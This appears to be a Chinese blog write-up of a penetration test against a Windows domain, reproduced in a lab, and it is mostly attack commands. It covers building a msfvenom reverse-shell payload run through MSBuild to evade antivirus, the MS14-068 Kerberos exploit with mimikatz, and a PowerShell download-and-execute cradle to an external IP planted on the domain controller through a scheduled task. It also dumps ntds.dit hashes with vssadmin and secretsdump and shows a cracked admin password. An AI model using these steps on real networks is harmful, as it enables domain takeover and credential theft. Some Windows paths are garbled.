一次授权任务的内网渗透

一、前言

在一次授权的渗透测试刚好遇到个存在ms14068的域环境由于对方不让写真实环境发表文章就自己搭建了类型相同的环境还是太菜大佬们别喷我。

二、白加黑反弹shell

由于对方存在360应该是好久没更新过

了直接用MSBuild就反弹shell到msf上了
msfVENOM生成shellcode：

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx l

shellcode.xml修改该xml的shellcode为msfvenom生成的将该文件上传至服务器进入msbuild目录：C:WindowsMicrosoft.NETFramework64v4.0.30319利用webshell执行：MSBuild.exe "C:wwwrootexecutes x64 shellcode.xml"

三、MS14-68获取域控
通过内网信息收集获取域控主机名

net group "domain controllers" /domain

通过ping主机名获取域控的ip地址

通过systeminfo发现没有打KB3011780补丁向服务器上传mimikatz和ms14-068exp。
先将内存中的kerberos票据清除

查看本机id：whoami /all

执行ms14068exp：MS14-068 -u 用户名@域 -p 密码 -s SID -d 域控ip

执行成功后会在当前目录下生成一个证书利用mimikatz导入证书

kerberos::ptc C:wwwrootTGT[email protected]

dir获取域控c盘的目录

利用ipc进行入侵copy一个bat文件到域控上利用at创建计划任务在bat中写入cs生成的powershell恶意代码

echo powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://101.132.43.162:8080/a'))" > 3.bat

net use \DC-FANXINGc$copy 3.bat \DC-FANXINGc$

获取域控系统时间at创建计划任务

net time \DC-FANXING
at \DC-FANXING 23:39:40 C:3.bat

四、导出ntds.dit文件
为了获取所有的用户hash我在域控上导出ntds文件这里导出的方式有很多比如ntdsutilvssadminvshadow等等这里我使用vssadmin导出ntds文件。
cs移植到msf上执行run 读取密码hash解出管理员密码为fx@123456

端口转发登录3389端口

创建快照：vssadmin create shadow /for=c:

复制ntds.dit：copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsNTDSntds.dit c:ntds.dit

复制system文件：copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsSystem32configSYSTEM

最后下载这两个文件到利用secretsdump.py来提取ntds文件即可

python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

五、后记
由于不允许文章打码方式放出来只能本地搭建环境好好学习天天向上。

本文始发于微信公众号（疯猫网络）：一次授权任务的内网渗透